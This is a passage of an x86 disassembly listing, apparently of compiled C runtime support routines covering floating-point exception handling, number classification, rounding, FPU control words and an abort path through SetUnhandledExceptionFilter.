		pop	edi
		pop	esi
		pop	ebx
		pop	ebp
		retn
sub_40FE06	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4100E0	proc near		; CODE XREF: sub_410407+21p

var_28		= qword	ptr -28h
var_10		= qword	ptr -10h
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		mov	eax, [ebp+arg_0]
		push	ebx
		push	esi
		xor	ebx, ebx
		mov	esi, eax
		and	esi, 1Fh
		inc	ebx
		test	al, 8
		mov	[ebp+var_4], esi
		jz	short loc_41010E
		test	byte ptr [ebp+arg_8], bl
		jz	short loc_41010E
		push	ebx
		call	sub_410644
		pop	ecx
		and	esi, 0FFFFFFF7h
		jmp	loc_41029F
; ---------------------------------------------------------------------------

loc_41010E:				; CODE XREF: sub_4100E0+18j
					; sub_4100E0+1Dj
		test	al, 4
		jz	short loc_410128
		test	byte ptr [ebp+arg_8], 4
		jz	short loc_410128
		push	4
		call	sub_410644
		pop	ecx
		and	esi, 0FFFFFFFBh
		jmp	loc_41029F
; ---------------------------------------------------------------------------

loc_410128:				; CODE XREF: sub_4100E0+30j
					; sub_4100E0+36j
		test	al, bl
		jz	loc_4101CA
		test	byte ptr [ebp+arg_8], 8
		jz	loc_4101CA
		push	8
		call	sub_410644
		mov	eax, [ebp+arg_8]
		pop	ecx
		mov	ecx, 0C00h
		and	eax, ecx
		jz	short loc_4101A2
		cmp	eax, 400h
		jz	short loc_41018C
		cmp	eax, 800h
		jz	short loc_410176
		cmp	eax, ecx
		jnz	short loc_4101C2
		fldz
		mov	ecx, [ebp+arg_4]
		fcomp	qword ptr [ecx]
		fnstsw	ax
		fld	dbl_4250C8
		test	ah, 5
		jnp	short loc_4101C0
		jmp	short loc_4101BE
; ---------------------------------------------------------------------------

loc_410176:				; CODE XREF: sub_4100E0+7Aj
		fldz
		mov	ecx, [ebp+arg_4]
		fcomp	qword ptr [ecx]
		fnstsw	ax
		test	ah, 5
		jnp	short loc_4101B0
		fld	dbl_4250C8
		jmp	short loc_4101BE
; ---------------------------------------------------------------------------

loc_41018C:				; CODE XREF: sub_4100E0+73j
		fldz
		mov	ecx, [ebp+arg_4]
		fcomp	qword ptr [ecx]
		fnstsw	ax
		test	ah, 5
		jp	short loc_4101B8
		fld	dbl_4250C8
		jmp	short loc_4101C0
; ---------------------------------------------------------------------------

loc_4101A2:				; CODE XREF: sub_4100E0+6Cj
		fldz
		mov	ecx, [ebp+arg_4]
		fcomp	qword ptr [ecx]
		fnstsw	ax
		test	ah, 5
		jp	short loc_4101B8

loc_4101B0:				; CODE XREF: sub_4100E0+A2j
		fld	dbl_4250B8
		jmp	short loc_4101C0
; ---------------------------------------------------------------------------

loc_4101B8:				; CODE XREF: sub_4100E0+B8j
					; sub_4100E0+CEj
		fld	dbl_4250B8

loc_4101BE:				; CODE XREF: sub_4100E0+94j
					; sub_4100E0+AAj
		fchs

loc_4101C0:				; CODE XREF: sub_4100E0+92j
					; sub_4100E0+C0j ...
		fstp	qword ptr [ecx]

loc_4101C2:				; CODE XREF: sub_4100E0+7Ej
		and	esi, 0FFFFFFFEh
		jmp	loc_41029F
; ---------------------------------------------------------------------------

loc_4101CA:				; CODE XREF: sub_4100E0+4Aj
					; sub_4100E0+54j
		test	al, 2
		jz	loc_41029F
		test	byte ptr [ebp+arg_8], 10h
		jz	loc_41029F
		xor	esi, esi
		test	al, 10h
		jz	short loc_4101E4
		mov	esi, ebx

loc_4101E4:				; CODE XREF: sub_4100E0+100j
		fldz
		push	edi
		mov	edi, [ebp+arg_4]
		fcomp	qword ptr [edi]
		fnstsw	ax
		test	ah, 44h
		jnp	loc_410289
		fld	qword ptr [edi]
		lea	eax, [ebp+var_8]
		push	eax		; int
		push	ecx
		push	ecx		; double
		fstp	[esp+28h+var_28]
		call	sub_410557
		mov	ecx, [ebp+var_8]
		fstp	[ebp+var_10]
		add	ecx, 0FFFFFA00h
		add	esp, 0Ch
		cmp	ecx, 0FFFFFBCEh
		jge	short loc_41022B
		fld	[ebp+var_10]
		mov	esi, ebx
		fmul	ds:dbl_41FE38
		jmp	short loc_41027F
; ---------------------------------------------------------------------------

loc_41022B:				; CODE XREF: sub_4100E0+13Cj
		fldz
		fcomp	[ebp+var_10]
		fnstsw	ax
		test	ah, 41h
		jnz	short loc_41023B
		mov	edx, ebx
		jmp	short loc_41023D
; ---------------------------------------------------------------------------

loc_41023B:				; CODE XREF: sub_4100E0+155j
		xor	edx, edx

loc_41023D:				; CODE XREF: sub_4100E0+159j
		movzx	eax, byte ptr [ebp+var_10+6]
		and	eax, 0Fh
		or	eax, 10h
		mov	word ptr [ebp+var_10+6], ax
		mov	eax, 0FFFFFC03h
		cmp	ecx, eax
		jge	short loc_410276
		sub	eax, ecx

loc_410256:				; CODE XREF: sub_4100E0+194j
		test	byte ptr [ebp+var_10], bl
		jz	short loc_410261
		test	esi, esi
		jnz	short loc_410261
		mov	esi, ebx

loc_410261:				; CODE XREF: sub_4100E0+179j
					; sub_4100E0+17Dj
		shr	dword ptr [ebp+var_10],	1
		test	byte ptr [ebp+var_10+4], bl
		jz	short loc_410270
		or	dword ptr [ebp+var_10],	80000000h

loc_410270:				; CODE XREF: sub_4100E0+187j
		shr	dword ptr [ebp+var_10+4], 1
		dec	eax
		jnz	short loc_410256

loc_410276:				; CODE XREF: sub_4100E0+172j
		test	edx, edx
		jz	short loc_410282
		fld	[ebp+var_10]
		fchs

loc_41027F:				; CODE XREF: sub_4100E0+149j
		fstp	[ebp+var_10]

loc_410282:				; CODE XREF: sub_4100E0+198j
		fld	[ebp+var_10]
		fstp	qword ptr [edi]
		jmp	short loc_41028B
; ---------------------------------------------------------------------------

loc_410289:				; CODE XREF: sub_4100E0+111j
		mov	esi, ebx

loc_41028B:				; CODE XREF: sub_4100E0+1A7j
		test	esi, esi
		pop	edi
		jz	short loc_410298
		push	10h
		call	sub_410644
		pop	ecx

loc_410298:				; CODE XREF: sub_4100E0+1AEj
		and	[ebp+var_4], 0FFFFFFFDh
		mov	esi, [ebp+var_4]

loc_41029F:				; CODE XREF: sub_4100E0+29j
					; sub_4100E0+43j ...
		test	byte ptr [ebp+arg_0], 10h
		jz	short loc_4102B6
		test	byte ptr [ebp+arg_8], 20h
		jz	short loc_4102B6
		push	20h
		call	sub_410644
		pop	ecx
		and	esi, 0FFFFFFEFh

loc_4102B6:				; CODE XREF: sub_4100E0+1C3j
					; sub_4100E0+1C9j
		xor	eax, eax
		test	esi, esi
		pop	esi
		setz	al
		pop	ebx
		leave
		retn
sub_4100E0	endp


; =============== S U B	R O U T	I N E =======================================



sub_4102C1	proc near		; CODE XREF: sub_410316+6Cp
					; sub_410316+91p ...

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		cmp	eax, 1
		jz	short loc_4102DD
		jle	short locret_4102E8
		cmp	eax, 3
		jg	short locret_4102E8
		call	sub_405D93
		mov	dword ptr [eax], 22h
		retn
; ---------------------------------------------------------------------------

loc_4102DD:				; CODE XREF: sub_4102C1+7j
		call	sub_405D93
		mov	dword ptr [eax], 21h

locret_4102E8:				; CODE XREF: sub_4102C1+9j
					; sub_4102C1+Ej
		retn
sub_4102C1	endp


; =============== S U B	R O U T	I N E =======================================



sub_4102E9	proc near		; CODE XREF: sub_410407+55p

arg_0		= byte ptr  4

		mov	al, [esp+arg_0]
		test	al, 20h
		jz	short loc_4102F5
		push	5
		jmp	short loc_41030B
; ---------------------------------------------------------------------------

loc_4102F5:				; CODE XREF: sub_4102E9+6j
		test	al, 8
		jz	short loc_4102FD
		xor	eax, eax
		inc	eax
		retn
; ---------------------------------------------------------------------------

loc_4102FD:				; CODE XREF: sub_4102E9+Ej
		test	al, 4
		jz	short loc_410305
		push	2
		jmp	short loc_41030B
; ---------------------------------------------------------------------------

loc_410305:				; CODE XREF: sub_4102E9+16j
		test	al, 1
		jz	short loc_41030D
		push	3

loc_41030B:				; CODE XREF: sub_4102E9+Aj
					; sub_4102E9+1Aj
		pop	eax
		retn
; ---------------------------------------------------------------------------

loc_41030D:				; CODE XREF: sub_4102E9+1Ej
		movzx	eax, al
		and	eax, 2
		add	eax, eax
		retn
sub_4102E9	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

; int __cdecl sub_410316(int,int,int,int,int,int,double,int)

sub_410316	proc near		; CODE XREF: sub_4103B4+2Ap
					; sub_410407+87p

var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= qword	ptr -8
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch
arg_18		= qword	ptr  20h
arg_20		= dword	ptr  28h

		push	ebp
		mov	ebp, esp
		sub	esp, 20h
		xor	eax, eax

loc_41031E:				; CODE XREF: sub_410316+18j
		mov	ecx, dword_424FD0[eax*8]
		cmp	ecx, [ebp+arg_4]
		jz	short loc_41038E
		inc	eax
		cmp	eax, 1Dh
		jl	short loc_41031E
		xor	eax, eax

loc_410332:				; CODE XREF: sub_410316+7Fj
		test	eax, eax
		mov	[ebp+var_1C], eax
		jz	short loc_410397
		mov	eax, [ebp+arg_8]
		mov	[ebp+var_18], eax
		mov	eax, [ebp+arg_C]
		mov	[ebp+var_14], eax
		mov	eax, [ebp+arg_10]
		mov	[ebp+var_10], eax
		mov	eax, [ebp+arg_14]
		push	esi
		mov	esi, [ebp+arg_0]
		mov	[ebp+var_C], eax
		mov	eax, dword ptr [ebp+arg_18]
		mov	dword ptr [ebp+var_8], eax
		mov	eax, dword ptr [ebp+arg_18+4]
		push	0FFFFh
		push	[ebp+arg_20]
		mov	[ebp+var_20], esi
		mov	dword ptr [ebp+var_8+4], eax
		call	sub_41061D
		lea	eax, [ebp+var_20]
		push	eax
		call	sub_40FCC8
		add	esp, 0Ch
		test	eax, eax
		jnz	short loc_410388
		push	esi
		call	sub_4102C1
		pop	ecx

loc_410388:				; CODE XREF: sub_410316+69j
		fld	[ebp+var_8]
		pop	esi
		leave
		retn
; ---------------------------------------------------------------------------

loc_41038E:				; CODE XREF: sub_410316+12j
		mov	eax, off_424FD4[eax*8]
		jmp	short loc_410332
; ---------------------------------------------------------------------------

loc_410397:				; CODE XREF: sub_410316+21j
		push	0FFFFh
		push	[ebp+arg_20]
		call	sub_41061D
		push	[ebp+arg_0]
		call	sub_4102C1
		fld	[ebp+arg_18]
		add	esp, 0Ch
		leave
		retn
sub_410316	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

; int __cdecl sub_4103B4(int,double,int)

sub_4103B4	proc near		; CODE XREF: sub_40AF03+51p

var_1C		= qword	ptr -1Ch
var_14		= qword	ptr -14h
var_C		= qword	ptr -0Ch
arg_0		= dword	ptr  8
arg_4		= qword	ptr  0Ch
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		cmp	dword_424FC0, 0
		jnz	short loc_4103E8
		push	[ebp+arg_C]	; int
		fld	[ebp+arg_4]
		sub	esp, 18h
		fstp	[esp+1Ch+var_C]
		fldz
		fstp	[esp+1Ch+var_14]
		fld	[ebp+arg_4]
		fstp	[esp+1Ch+var_1C]
		push	[ebp+arg_0]	; int
		push	1		; int
		call	sub_410316
		add	esp, 24h
		pop	ebp
		retn
; ---------------------------------------------------------------------------

loc_4103E8:				; CODE XREF: sub_4103B4+Aj
		call	sub_405D93
		push	0FFFFh
		push	[ebp+arg_C]
		mov	dword ptr [eax], 21h
		call	sub_41061D
		fld	[ebp+arg_4]
		pop	ecx
		pop	ecx
		pop	ebp
		retn
sub_4103B4	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

; int __cdecl sub_410407(int,int,double,double,int)

sub_410407	proc near		; CODE XREF: sub_40AF03:loc_40AFC8p

var_9C		= qword	ptr -9Ch
var_94		= qword	ptr -94h
var_8C		= qword	ptr -8Ch
var_84		= dword	ptr -84h
var_80		= byte ptr -80h
var_40		= dword	ptr -40h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= qword	ptr  10h
arg_10		= qword	ptr  18h
arg_18		= dword	ptr  20h

		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF0h
		sub	esp, 80h
		mov	eax, dword_424064
		xor	eax, esp
		mov	[esp+80h+var_4], eax
		push	[ebp+arg_18]
		lea	eax, [ebp+arg_10]
		push	eax
		push	[ebp+arg_0]
		call	sub_4100E0
		add	esp, 0Ch
		test	eax, eax
		jnz	short loc_410459
		and	[esp+80h+var_40], 0FFFFFFFEh
		push	eax
		lea	eax, [ebp+arg_10]
		push	eax
		lea	eax, [ebp+arg_8]
		push	eax
		push	[ebp+arg_4]
		lea	eax, [ebp+arg_18]
		push	[ebp+arg_0]
		push	eax
		lea	eax, [esp+98h+var_80]
		push	eax
		call	sub_40FE06
		add	esp, 1Ch

loc_410459:				; CODE XREF: sub_410407+2Bj
		push	[ebp+arg_0]
		call	sub_4102E9
		add	esp, 4
		cmp	dword_424FC0, 0
		jnz	short loc_410498
		test	eax, eax
		jz	short loc_410498
		push	[ebp+arg_18]	; int
		fld	[ebp+arg_10]
		sub	esp, 18h
		fstp	[esp+9Ch+var_8C]
		fldz
		fstp	[esp+9Ch+var_94]
		fld	[ebp+arg_8]
		fstp	[esp+9Ch+var_9C]
		push	[ebp+arg_4]	; int
		push	eax		; int
		call	sub_410316
		add	esp, 24h
		jmp	short loc_4104B2
; ---------------------------------------------------------------------------

loc_410498:				; CODE XREF: sub_410407+64j
					; sub_410407+68j
		push	eax
		call	sub_4102C1
		mov	[esp+84h+var_84], 0FFFFh
		push	[ebp+arg_18]
		call	sub_41061D
		fld	[ebp+arg_10]
		pop	ecx
		pop	ecx

loc_4104B2:				; CODE XREF: sub_410407+8Fj
		mov	ecx, [esp+80h+var_4]
		xor	ecx, esp
		call	sub_402C9E
		mov	esp, ebp
		pop	ebp
		retn
sub_410407	endp


; =============== S U B	R O U T	I N E =======================================


; int __cdecl sub_4104C1(double)

sub_4104C1	proc near		; CODE XREF: sub_40AF03:loc_40AF89p

var_8		= qword	ptr -8
arg_0		= qword	ptr  4

		push	ecx
		push	ecx
		fld	[esp+8+arg_0]
		frndint
		fstp	[esp+8+var_8]
		fld	[esp+8+var_8]
		pop	ecx
		pop	ecx
		retn
sub_4104C1	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

; int __cdecl sub_4104D2(double,int)

sub_4104D2	proc near		; CODE XREF: sub_410557+79p
					; sub_410557+8Ep

var_8		= qword	ptr -8
arg_0		= qword	ptr  8
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ecx
		mov	eax, [ebp+arg_8]
		fld	[ebp+arg_0]
		mov	ecx, dword ptr [ebp+arg_0+6]
		fstp	[ebp+var_8]
		add	eax, 3FEh
		shl	eax, 4
		and	ecx, 0FFFF800Fh
		or	eax, ecx
		mov	word ptr [ebp+var_8+6],	ax
		fld	[ebp+var_8]
		leave
		retn
sub_4104D2	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4104FC	proc near		; CODE XREF: sub_40AF03+31p

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		xor	edx, edx
		cmp	[ebp+arg_4], 7FF00000h
		jnz	short loc_410514
		cmp	[ebp+arg_0], edx
		jnz	short loc_410527
		xor	eax, eax
		inc	eax
		pop	ebp
		retn
; ---------------------------------------------------------------------------

loc_410514:				; CODE XREF: sub_4104FC+Cj
		cmp	[ebp+arg_4], 0FFF00000h
		jnz	short loc_410527
		cmp	[ebp+arg_0], edx
		jnz	short loc_410527
		push	2

loc_410524:				; CODE XREF: sub_4104FC+3Cj
					; sub_4104FC+55j
		pop	eax
		pop	ebp
		retn
; ---------------------------------------------------------------------------

loc_410527:				; CODE XREF: sub_4104FC+11j
					; sub_4104FC+1Fj ...
		mov	ecx, [ebp+arg_4+2]
		mov	eax, 7FF8h
		and	ecx, eax
		cmp	cx, ax
		jnz	short loc_41053A
		push	3
		jmp	short loc_410524
; ---------------------------------------------------------------------------

loc_41053A:				; CODE XREF: sub_4104FC+38j
		cmp	cx, 7FF0h
		jnz	short loc_410553
		test	[ebp+arg_4], 7FFFFh
		jnz	short loc_41054F
		cmp	[ebp+arg_0], edx
		jz	short loc_410553

loc_41054F:				; CODE XREF: sub_4104FC+4Cj
		push	4
		jmp	short loc_410524
; ---------------------------------------------------------------------------

loc_410553:				; CODE XREF: sub_4104FC+43j
					; sub_4104FC+51j
		xor	eax, eax
		pop	ebp
		retn
sub_4104FC	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

; int __cdecl sub_410557(double,int)

sub_410557	proc near		; CODE XREF: sub_4100E0+122p

var_C		= qword	ptr -0Ch
arg_0		= qword	ptr  8
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		fldz
		fcom	[ebp+arg_0]
		fnstsw	ax
		test	ah, 44h
		jp	short loc_41056D
		xor	edx, edx
		jmp	loc_4105FF
; ---------------------------------------------------------------------------

loc_41056D:				; CODE XREF: sub_410557+Dj
		xor	ecx, ecx
		test	word ptr [ebp+arg_0+6],	7FF0h
		jnz	short loc_4105DA
		test	dword ptr [ebp+arg_0+4], 0FFFFFh
		jnz	short loc_410585
		cmp	dword ptr [ebp+arg_0], ecx
		jz	short loc_4105DA

loc_410585:				; CODE XREF: sub_410557+27j
		fcomp	[ebp+arg_0]
		mov	edx, 0FFFFFC03h
		fnstsw	ax
		test	ah, 41h
		jnz	short loc_410599
		xor	eax, eax
		inc	eax
		jmp	short loc_4105B1
; ---------------------------------------------------------------------------

loc_410599:				; CODE XREF: sub_410557+3Bj
		xor	eax, eax
		jmp	short loc_4105B1
; ---------------------------------------------------------------------------

loc_41059D:				; CODE XREF: sub_410557+5Ej
		shl	dword ptr [ebp+arg_0+4], 1
		test	dword ptr [ebp+arg_0], 80000000h
		jz	short loc_4105AD
		or	dword ptr [ebp+arg_0+4], 1

loc_4105AD:				; CODE XREF: sub_410557+50j
		shl	dword ptr [ebp+arg_0], 1
		dec	edx

loc_4105B1:				; CODE XREF: sub_410557+40j
					; sub_410557+44j
		test	byte ptr [ebp+arg_0+6],	10h
		jz	short loc_41059D
		and	word ptr [ebp+arg_0+6],	0FFEFh
		cmp	eax, ecx
		jz	short loc_4105C7
		or	word ptr [ebp+arg_0+6],	8000h

loc_4105C7:				; CODE XREF: sub_410557+68j
		fld	[ebp+arg_0]
		push	ecx		; int
		push	ecx
		push	ecx		; double
		fstp	[esp+0Ch+var_C]
		call	sub_4104D2
		add	esp, 0Ch
		jmp	short loc_4105FF
; ---------------------------------------------------------------------------

loc_4105DA:				; CODE XREF: sub_410557+1Ej
					; sub_410557+2Cj
		push	ecx		; int
		fstp	st
		fld	[ebp+arg_0]
		push	ecx
		push	ecx		; double
		fstp	[esp+0Ch+var_C]
		call	sub_4104D2
		mov	edx, dword ptr [ebp+arg_0+6]
		shr	edx, 4
		and	edx, 7FFh
		add	esp, 0Ch
		sub	edx, 3FEh

loc_4105FF:				; CODE XREF: sub_410557+11j
					; sub_410557+81j
		mov	eax, [ebp+arg_8]
		mov	[eax], edx
		pop	ebp
		retn
sub_410557	endp


; =============== S U B	R O U T	I N E =======================================



sub_410606	proc near		; CODE XREF: sub_40FE06+DCp

var_4		= word ptr -4

		push	ecx
		fstsw	[esp+4+var_4]
		movsx	eax, [esp+4+var_4]
		pop	ecx
		retn
sub_410606	endp


; =============== S U B	R O U T	I N E =======================================



sub_410611	proc near		; CODE XREF: sub_40FE06:loc_410019p

var_4		= word ptr -4

		push	ecx
		fnstsw	[esp+4+var_4]
		fnclex
		movsx	eax, [esp+4+var_4]
		pop	ecx
		retn
sub_410611	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41061D	proc near		; CODE XREF: sub_40AF03+13p
					; sub_40AF03+5Dp ...

var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		push	ecx
		fstcw	word ptr [ebp+var_4]
		mov	eax, [ebp+arg_4]
		mov	ecx, [ebp+arg_0]
		and	ecx, [ebp+arg_4]
		not	eax
		and	eax, [ebp+var_4]
		or	eax, ecx
		movzx	eax, ax
		mov	[ebp+arg_4], eax
		fldcw	word ptr [ebp+arg_4]
		movsx	eax, word ptr [ebp+var_4]
		leave
		retn
sub_41061D	endp


; =============== S U B	R O U T	I N E =======================================



sub_410644	proc near		; CODE XREF: sub_4100E0+20p
					; sub_4100E0+3Ap ...

var_8		= qword	ptr -8
arg_0		= dword	ptr  4

		push	ecx
		push	ecx
		mov	cl, byte ptr [esp+8+arg_0]
		test	cl, 1
		jz	short loc_41065A
		fld	tbyte_4250E0
		fistp	[esp+8+arg_0]
		wait

loc_41065A:				; CODE XREF: sub_410644+9j
		test	cl, 8
		jz	short loc_41066F
		fstsw	ax
		fld	tbyte_4250E0
		fstp	[esp+8+var_8]
		wait
		fstsw	ax

loc_41066F:				; CODE XREF: sub_410644+19j
		test	cl, 10h
		jz	short loc_41067E
		fld	tbyte_4250EC
		fstp	[esp+8+var_8]
		wait

loc_41067E:				; CODE XREF: sub_410644+2Ej
		test	cl, 4
		jz	short loc_41068C
		fldz
		fld1
		fdivrp	st(1), st
		fstp	st
		wait

loc_41068C:				; CODE XREF: sub_410644+3Dj
		test	cl, 20h
		jz	short loc_410697
		fldpi
		fstp	[esp+8+var_8]
		wait

loc_410697:				; CODE XREF: sub_410644+4Bj
		pop	ecx
		pop	ecx
		retn
sub_410644	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41069A	proc near		; CODE XREF: sub_413A67+243p

ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

		push	8
		push	offset dword_422E58
		call	__SEH_prolog4
		xor	eax, eax
		cmp	dword_437E9C, eax
		jz	short loc_410706
		test	byte ptr [ebp+arg_0], 40h
		jz	short loc_4106FE
		cmp	dword_4250F8, eax
		jz	short loc_4106FE
		mov	[ebp+ms_exc.disabled], eax
		ldmxcsr	[ebp+arg_0]
		jmp	short loc_4106F5
; ---------------------------------------------------------------------------
		mov	eax, [ebp+ms_exc.exc_ptr]
		mov	eax, [eax]
		mov	eax, [eax]
		cmp	eax, 0C0000005h
		jz	short loc_4106DF
		cmp	eax, 0C000001Dh
		jz	short loc_4106DF
		xor	eax, eax
		retn
; ---------------------------------------------------------------------------

loc_4106DF:				; CODE XREF: sub_41069A+39j
					; sub_41069A+40j
		xor	eax, eax
		inc	eax
		retn
; ---------------------------------------------------------------------------
		mov	esp, [ebp+ms_exc.old_esp]
		and	dword_4250F8, 0
		and	[ebp+arg_0], 0FFFFFFBFh
		ldmxcsr	[ebp+arg_0]

loc_4106F5:				; CODE XREF: sub_41069A+2Bj
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		jmp	short loc_410706
; ---------------------------------------------------------------------------

loc_4106FE:				; CODE XREF: sub_41069A+1Aj
					; sub_41069A+22j
		and	[ebp+arg_0], 0FFFFFFBFh
		ldmxcsr	[ebp+arg_0]

loc_410706:				; CODE XREF: sub_41069A+14j
					; sub_41069A+62j
		call	__SEH_epilog4
		retn
sub_41069A	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41070C	proc near		; CODE XREF: sub_41075D+Ap

var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= byte ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= byte ptr  14h

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	[ebp+arg_0]
		lea	ecx, [ebp+var_10]
		call	sub_402CAD
		movzx	eax, [ebp+arg_4]
		mov	ecx, [ebp+var_C]
		mov	dl, [ebp+arg_C]
		test	[ecx+eax+1Dh], dl
		jnz	short loc_41074B
		cmp	[ebp+arg_8], 0
		jz	short loc_410745
		mov	ecx, [ebp+var_10]
		mov	ecx, [ecx+0C8h]
		movzx	eax, word ptr [ecx+eax*2]
		and	eax, [ebp+arg_8]
		jmp	short loc_410747
; ---------------------------------------------------------------------------

loc_410745:				; CODE XREF: sub_41070C+25j
		xor	eax, eax

loc_410747:				; CODE XREF: sub_41070C+37j
		test	eax, eax
		jz	short loc_41074E

loc_41074B:				; CODE XREF: sub_41070C+1Fj
		xor	eax, eax
		inc	eax

loc_41074E:				; CODE XREF: sub_41070C+3Dj
		cmp	[ebp+var_4], 0
		jz	short locret_41075B
		mov	ecx, [ebp+var_8]
		and	dword ptr [ecx+70h], 0FFFFFFFDh

locret_41075B:				; CODE XREF: sub_41070C+46j
		leave
		retn
sub_41070C	endp


; =============== S U B	R O U T	I N E =======================================



sub_41075D	proc near		; CODE XREF: sub_40B144+3Fp
					; sub_40B27C+53p ...

arg_0		= dword	ptr  4

		push	4
		push	0
		push	[esp+8+arg_0]
		push	0
		call	sub_41070C
		add	esp, 10h
		retn
sub_41075D	endp


; =============== S U B	R O U T	I N E =======================================



sub_410770	proc near		; CODE XREF: sub_40B6DE+56p
					; sub_40BC59+59p ...

arg_0		= dword	ptr  4

		xor	eax, eax
		inc	eax
		cmp	[esp+arg_0], 0
		jnz	short locret_41077C
		xor	eax, eax

locret_41077C:				; CODE XREF: sub_410770+8j
		retn
sub_410770	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame fpd=2A8h


sub_41077D	proc near		; CODE XREF: sub_40C419:loc_40C447p

var_328		= dword	ptr -328h
var_31C		= dword	ptr -31Ch
var_2D8		= dword	ptr -2D8h
var_2D4		= dword	ptr -2D4h
var_2D0		= dword	ptr -2D0h
var_244		= word ptr -244h
var_240		= word ptr -240h
var_23C		= word ptr -23Ch
var_238		= word ptr -238h
var_234		= dword	ptr -234h
var_230		= dword	ptr -230h
var_22C		= dword	ptr -22Ch
var_228		= dword	ptr -228h
var_224		= dword	ptr -224h
var_220		= dword	ptr -220h
var_21C		= dword	ptr -21Ch
var_218		= dword	ptr -218h
var_214		= word ptr -214h
var_210		= dword	ptr -210h
var_20C		= dword	ptr -20Ch
var_208		= word ptr -208h
var_4		= dword	ptr -4

		push	ebp
		lea	ebp, [esp-2A8h]
		sub	esp, 328h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+2A8h+var_4], eax
		test	byte_4250FC, 1
		push	esi
		jz	short loc_4107AA
		push	0Ah
		call	sub_40A074
		pop	ecx

loc_4107AA:				; CODE XREF: sub_41077D+23j
		call	sub_40E2DC
		test	eax, eax
		jz	short loc_4107BB
		push	16h
		call	sub_40E2E9
		pop	ecx

loc_4107BB:				; CODE XREF: sub_41077D+34j
		test	byte_4250FC, 2
		jz	loc_410868
		mov	[ebp+2A8h+var_220], eax
		mov	[ebp+2A8h+var_224], ecx
		mov	[ebp+2A8h+var_228], edx
		mov	[ebp+2A8h+var_22C], ebx
		mov	[ebp+2A8h+var_230], esi
		mov	[ebp+2A8h+var_234], edi
		mov	[ebp+2A8h+var_208], ss
		mov	[ebp+2A8h+var_214], cs
		mov	[ebp+2A8h+var_238], ds
		mov	[ebp+2A8h+var_23C], es
		mov	[ebp+2A8h+var_240], fs
		mov	[ebp+2A8h+var_244], gs
		pushf
		pop	[ebp+2A8h+var_210]
		mov	esi, [ebp+2ACh]
		lea	eax, [ebp+2ACh]
		mov	[ebp+2A8h+var_20C], eax
		mov	[ebp+2A8h+var_2D0], 10001h
		mov	[ebp+2A8h+var_218], esi
		mov	eax, [eax-4]
		push	50h
		mov	[ebp+2A8h+var_21C], eax
		lea	eax, [ebp+2A8h+var_328]
		push	0
		push	eax
		call	sub_408130
		lea	eax, [ebp+2A8h+var_328]
		add	esp, 0Ch
		mov	[ebp+2A8h+var_2D8], eax
		lea	eax, [ebp+2A8h+var_2D0]
		push	0
		mov	[ebp+2A8h+var_328], 40000015h
		mov	[ebp+2A8h+var_31C], esi
		mov	[ebp+2A8h+var_2D4], eax
		call	ds:dword_41E19C	; SetUnhandledExceptionFilter
		lea	eax, [ebp+2A8h+var_2D8]
		push	eax
		call	ds:off_41E198

loc_410868:				; CODE XREF: sub_41077D+45j
		push	3
		call	sub_4080AA
		int	3		; Trap to Debugger
sub_41077D	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_410870	proc near		; CODE XREF: sub_40C517+25Ap
					; sub_40C8FC+150p

var_C		= byte ptr -0Ch
var_6		= byte ptr -6
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 0Ch
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	6
		lea	eax, [ebp+var_C]
		push	eax
		push	1004h
		push	[ebp+arg_0]
		mov	[ebp+var_6], 0
		call	ds:off_41E054
		test	eax, eax
		jnz	short loc_4108A1
		or	eax, 0FFFFFFFFh
		jmp	short loc_4108AB
; ---------------------------------------------------------------------------

loc_4108A1:				; CODE XREF: sub_410870+2Aj
		lea	eax, [ebp+var_C]
		push	eax
		call	sub_404365
		pop	ecx

loc_4108AB:				; CODE XREF: sub_410870+2Fj
		mov	ecx, [ebp+var_4]
		xor	ecx, ebp
		call	sub_402C9E
		leave
		retn
sub_410870	endp


; =============== S U B	R O U T	I N E =======================================
